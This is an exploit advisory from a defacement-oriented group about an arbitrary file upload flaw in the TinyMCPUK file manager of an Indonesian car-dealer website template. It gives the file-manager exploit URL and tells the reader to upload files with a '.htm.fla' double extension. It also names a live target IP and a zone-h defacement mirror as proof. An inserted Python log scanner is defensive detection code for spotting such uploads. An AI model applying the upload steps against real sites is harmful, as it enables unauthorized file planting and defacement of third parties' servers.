Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability

Author: KingSkrupellos, Published: 11-10-2018
# Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability
# Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage => mediatechindonesia.com
# Google Dork => All rights reserved. © 2015 Media Tech Indonesia
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018050180
# Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html

#################################################################################

Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm

Please upload your file as => /yourfilename.htm.fla

Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla
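
Defender-side check for the behaviour described above, as an added example that is not part of the original advisory: it scans web server access logs for requests to the file manager and for fetches of files in the Flash upload folder whose name carries an active-content extension such as .htm.fla. The combined log format, the extension set (which goes beyond the single .htm.fla case in the text), the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths as given in the advisory, lower-cased for comparison.
FILEMANAGER_PREFIX = "/tinymcpuk/filemanager/"
UPLOAD_PREFIX = "/tinymcpuk/gambar/flash/"
# Assumption: extension components a browser or server may treat as active content.
ACTIVE_EXTS = {"htm", "html", "shtml", "php", "phtml", "js", "svg"}
# Assumption: access log in Apache/nginx "combined" format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} ')

def classify(line):
    """Return (client, reason) for a request worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target = m.groups()
    path = unquote(urlsplit(target).path).lower()
    if path.startswith(FILEMANAGER_PREFIX):
        # Any reach to the file manager is notable; a POST may be an upload.
        return (client, "filemanager-post" if method == "POST" else "filemanager-access")
    if path.startswith(UPLOAD_PREFIX):
        # "name.htm.fla" -> ["htm", "fla"]; check every extension component.
        exts = path.rsplit("/", 1)[-1].split(".")[1:]
        if ACTIVE_EXTS.intersection(exts):
            return (client, "active-content-in-upload-dir")
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, hypothetical file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2018:10:00:01 +0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Oct/2018:10:00:05 +0700] "GET /tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Oct/2018:10:00:09 +0700] "POST /tinymcpuk/filemanager/connectors/php/connector.php?Type=Flash HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Oct/2018:10:00:12 +0700] "GET /tinymcpuk/gambar/Flash/sample.htm.fla HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [11/Oct/2018:10:01:00 +0700] "GET /tinymcpuk/gambar/Flash/banner.swf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

Any hit on the upload folder is a prompt to inspect the file on disk and to restrict or remove the file manager if it is reachable without authentication.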

#################################################################################

Example Sites and Target IP => 103.27.206.203

Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406

#################################################################################

Discovered By : KingSkrupellos from Cyberizm.Org

#################################################################################
